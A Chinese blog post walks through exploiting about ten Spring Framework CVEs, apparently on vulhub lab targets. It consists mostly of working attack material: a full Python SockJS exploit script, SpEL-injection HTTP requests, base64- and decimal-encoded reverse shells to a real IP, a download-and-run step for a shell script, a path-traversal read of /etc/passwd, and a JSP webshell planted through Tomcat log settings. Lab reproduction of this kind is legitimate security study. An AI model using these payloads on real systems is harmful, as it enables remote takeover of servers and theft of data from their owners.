spring系列漏洞复现

漏洞复现
字数统计: 4.1k   |   阅读时长≈ 21 分钟

spring Websocket RCE(CVE-2018-1270)

影响范围如⬇️:Spring Framework 4.3 - 4.3.15Spring Framework 5.0 - 5.0.5

漏洞指纹

url/gs-guide-websocket
789
exp:


import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)

    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))

        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://8.130.100.154:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c",'
                '"exec 5<>/dev/tcp/8.130.100.154/80;cat <&5 | while read line; do $line 2>&5 >&5; done"})',
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

789

Spring Data RCE(CVE-2018-1273)

影响范围如⬇️:Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) Spring Data Commons 2.0 to 2.0.5 (Kay SR5) Spring Data REST 3.0 - 3.0.5 (Kay SR5)

漏洞指纹

不是很明显,可能存在spring框架和数据库交互的地方(例如表单)

漏洞复现

主页面没有啥
使用目录扫描工具扫描到目录/users,访问看看
132
随便输入一点抓包
123

改一下
使用dnslog测试一下

POST:

POST /users?page=&size=5 HTTP/1.1
Host: 8.130.100.1xx:8080
Content-Length: 127
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Origin: http://8.130.100.154:8080
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8.130.100.154:8080/users?page=&size=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gosession=MTY5OTg3OTkyMHxEWDhFQVFMX2dBQUJFQUVRQUFCQV80QUFBUVp6ZEhKcGJtY01CQUFDYVdRR2MzUnlhVzVuRENZQUpEUTFOR00zTmpJMUxUVTROalF0TkdFd1pDMWhOams0TFRRMVptRXhNakEwTjJSa1lRPT18PRHNBt47aG28oC6jqqZpQ79n0DnHBAy1NITTlRpY=
Connection: close

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping 9r6b8g.dnslog.cn")]=&password=&repeatedPassword=

123
那么就开始反弹一个shell
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64 -d}|{bash -i}")]=&password=&repeatedPassword=

发现不成功,也不知道哪里出了问题
看下一种方法:

在自己的服务器上放一个shell脚本。然后开启http服务让受害者去访问这个地址。
服务器:
1、建立一个shell脚本

exp.sh
bash -i >& /dev/tcp/8.130.xxx.1x4/80 0>&1

2、开启HTTP服务

python -m http.server
465

3(可省略)、然后让靶机下载该文件到/tmp目录下。(其他目录下可能要赋予权限,比较麻烦)

wget http://x.x.xx.x/exp.sh
123

4、靶机使用curl命令将exp.sh写到/tmp目录下。

curl -o /tmp/exp.sh http://8.xxx.xxx.xx4:8000/exp.sh
132

5、然后靶机运行shell文件

bash /tmp/exp.sh

成功连接上
123

Spring Data REST RCE(CVE-2017-8046)

影响版本:

Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3

Spring Boot version < 2.0.0M4

Spring Data release trains < Kay-RC3

漏洞指纹

132

{
  "_links" : {
    "customers" : {
      "href" : "http://x.x.x.x:8080/customers"
    },
    "profile" : {
      "href" : "http://x.x.x.x:8080/profile"
    }
  }
}

看到json格式的返回值,说明这是一个Restful风格的api服务器
指纹就是网页全是json,里面有一些类

漏洞复现

访问/customers/1,符合漏洞指纹。
465

PATCH的值是SpEL表达式,添加请求头为Content-Type:application/json-patch+json ,而且命令需要改为10进制编码。

PATCH /customers/1 HTTP/1.1
Host: 8.130.100.154:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gosession=MTY5OTg3OTkyMHxEWDhFQVFMX2dBQUJFQUVRQUFCQV80QUFBUVp6ZEhKcGJtY01CQUFDYVdRR2MzUnlhVzVuRENZQUpEUTFOR00zTmpJMUxUVTROalF0TkdFd1pDMWhOams0TFRRMVptRXhNakEwTjJSa1lRPT18P_GIRHNBt47aG28oC6jqqZpQ79n0DnHBAy1NITTlRpY=
If-None-Match: "0"
If-Modified-Since: Tue, 21 Nov 2023 13:09:48 GMT
Content-Type: application/json-patch+json
Connection: close
Content-Length: 468

[
  { "op": "replace", 
    "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,52,76,106,69,122,77,67,52,120,77,68,65,117,77,84,85,48,76,122,103,119,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname",
    "value": "exploit" 
  }
]

这里的十进制就是bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}

然后服务器监听端口,靶机这边再使用bp发送上述报文
123
发现成功反弹shell
123

Spring Web Flow RCE(CVE-2017-4971)

影响范围
Spring Web Flow 2.4.0 - 2.4.4
详细漏洞分析Spring Web Flow 远程代码执行漏洞分析(CVE-2017-4971)

漏洞指纹

无明显漏洞指纹,在各种提交表单的地方可以尝试

利用条件

  • 1、MvcViewFactoryCreator对象的useSpringBeanBinding参数需要设置为false(默认值)
  • 2、flow view 对象中设置BinderConfiguration对象为空

漏洞复现

随便登录一个账户,账号密码都已经给出
12
登录之后随便进入一个房间
123
之后点击预定酒店(Book Hotel)
然后将信息随便完善一下
456
点击confirm,此时记得开启抓包,因为这里有csrf的token限制,所以重放是没有用的
先使用dnslog测试一下
123
123

反弹shell

_eventId_confirm=&_csrf=eed53409-7b2a-4b0e-b00b-27e6beb51aeb&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/8.130.100.154/80+0>%261")).start()=vulhub
(记得这样url编码一下,不然反弹不成功,已经试过了。。。)
123
123

Spring Security OAuth2 RCE(CVE-2016-4977)

影响范围:
Spring Security OAuth 2.0 - 2.0.9
Spring Secutiry OAuth 1.0-1.0.5

漏洞指纹

访问

/oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test

存在登录页面
默认账号密码admin/admin
然后回显这个画面 45
说明就是存在漏洞
payload生成脚本

#!/usr/bin/env python

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 

poc += ')}'

print(poc)

123
复制一下结果并且拼接到这里
oauth/authorize?response_type=${POC}&client_id=acme&scope=openid&redirect_uri=http://test
发现无回显 12

弹个shell试一试
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
123
服务器监听端口

nc -lvnp 80

payload

http://8.130.100.154:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(85)).concat(T(java.lang.Character).toString(48)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

反弹成功
12

Spring Boot 目录遍历(CVE-2021-21234)

漏洞影响范围:spring boot actuator logview < 0.2.13

漏洞指纹

首页为ok
or首页为Hellow Spring Boot
132

漏洞复现

#Windows
{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../

#Windows
{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../

#Linux
{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../

#Linux
{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../

123

Spring Data MongoDB SpEL Expression injection(CVE-2022-22980)

影响版本:
Spring Data MongoDB == 3.4.0
3.3.0 <= Spring Data MongoDB <= 3.3.4

漏洞指纹

无明显指纹,如果存在spring+mongodb 的组合可以盲打一下

漏洞复现

name=T(java.lang.String).forName(‘java.lang.Runtime’).getRuntime().exec(‘ls’)

Spring Framework RCE(CVE-2022-22965)

影响版本:
jdk9+ & Spring及其衍生框架 & 使用tomcat部署spring项目 & 使用了POJO参数绑定 & (Spring Framework 5.3.x - 5.3.18 | Spring Framework 2.x - 5.2.20)

漏洞指纹

无明显漏洞指纹,看到识别到 Spring+Java 的站可以盲打一下

漏洞复现


class.module.classLoader.resources.context.parent.pipeline.first.pattern=
构建文件的内容

class.module.classLoader.resources.context.parent.pipeline.first.suffix=
修改tomcat日志文件后缀

class.module.classLoader.resources.context.parent.pipeline.first.directory=
写入文件所在的网站根目录

class.module.classLoader.resources.context.parent.pipeline.first.prefix=
写入文件名称

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
文件日期格式(实际构造为空值即可)

可以一个一个的GET发送,或者直接一次性POST发送,GET形如下面这种形式说明payload成功

GET发送

class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

http://8.130.100.154:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
最后访问shell.jsp
132

写shell

url编码前的webshell:
%{c2}i if("t".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i

url编码后的webshell:
%25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di

所以现在只需要把shell.jsp的内容换成下面的

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di

同时在请求中需要加3个header

suffix:%>//
c1:Runtime
c2:<%

123

Spring Cloud Function RCE(CVE-2022-22963)

影响版本:
3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

指纹

/functionRouter

复现

访问/functionRouter 使用POST发包,然后在header头里面放置payload
456
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}")
然后服务器监听端口,之后发包,反弹成功
123

Spring Cloud Gateway RCE(CVE-2022-22947)

这个洞有两个前提

  • management.endpoint.gateway.enabled: true
  • management.endpoints.web.exposure.include: gateway

影响版本
pring Cloud Gateway 3.1.0 Spring Cloud Gateway 3.0.0 - 3.0.6 旧的不受支持的版本也受影响

指纹

先介绍一下Spring cloud GateWay的actuator相关端点

  • 获取所有路由:Get请求:http://localhost:xxxx/actuator/gateway/routes/

  • 添加路由:POST请求:http://localhost:xxxx/actuator/gateway/routes/路由编号

  • 删除路由:DELETE请求:http://localhost:xxxx/actuator/gateway/routes/路由编号

  • 获取指定路由:GET请求:http://localhost:xxxx/actuator/gateway/routes/路由编号

  • 刷新路由:POST请求:http://localhost:xxxx/actuator/gateway/refresh

其中,调用添加路由的端点时,可以向路由中加入filters,过滤器的值允许为spEL表达式,且会解析这个spEL表达式。可以通过构造spEL进行远程命令执行。构造的filters可以直接利用gateway自带的AddResponseHeader,将spEL的执行结果添加到响应头中,直接通过响应头进行查看

所以指纹就很清楚了–> /actutor/gateway

漏洞复现

漏洞利用过程为:添加路由–>触发payload–>查看结果 其本质为SpEL表达式注入,在添加路由时的value处插入表达式即可

添加路由

POST /actuator/gateway/routes/milu HTTP/1.1
Host:x.x.x.x:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

alue”: “#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}”

这里filters里的name可以任意修改为下面的内容

#过滤器使用说明
https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/#the-addrequestheader-gatewayfilter-factory

AddRequestHeader
MapRequestHeader
AddRequestParameter
AddResponseHeader
ModifyRequestBody
DedupeResponseHeader
ModifyResponseBody
CacheRequestBody
PrefixPath
PreserveHostHeader
RedirectTo
RemoveRequestHeader
RemoveRequestParameter
RemoveResponseHeader
RewritePath
Retry
SetPath
SecureHeaders
SetRequestHeader
SetRequestHostHeader
RewriteResponseHeader
RewriteLocationResponseHeader
SetStatus
SaveSession
StripPrefix
RequestHeaderToRequestUri
RequestSize
RequestHeaderSize

触发payload

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

查看结果

访问 –> /actuator/gateway/routes/milu
123

删除路由


DELETE /actuator/gateway/routes/milu HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

刷新路由


POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

参考文章:从0认识+识别+掌握spring全漏洞(1.8w字超详细看完拿捏spring)

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

请我喝杯咖啡吧~

支付宝
微信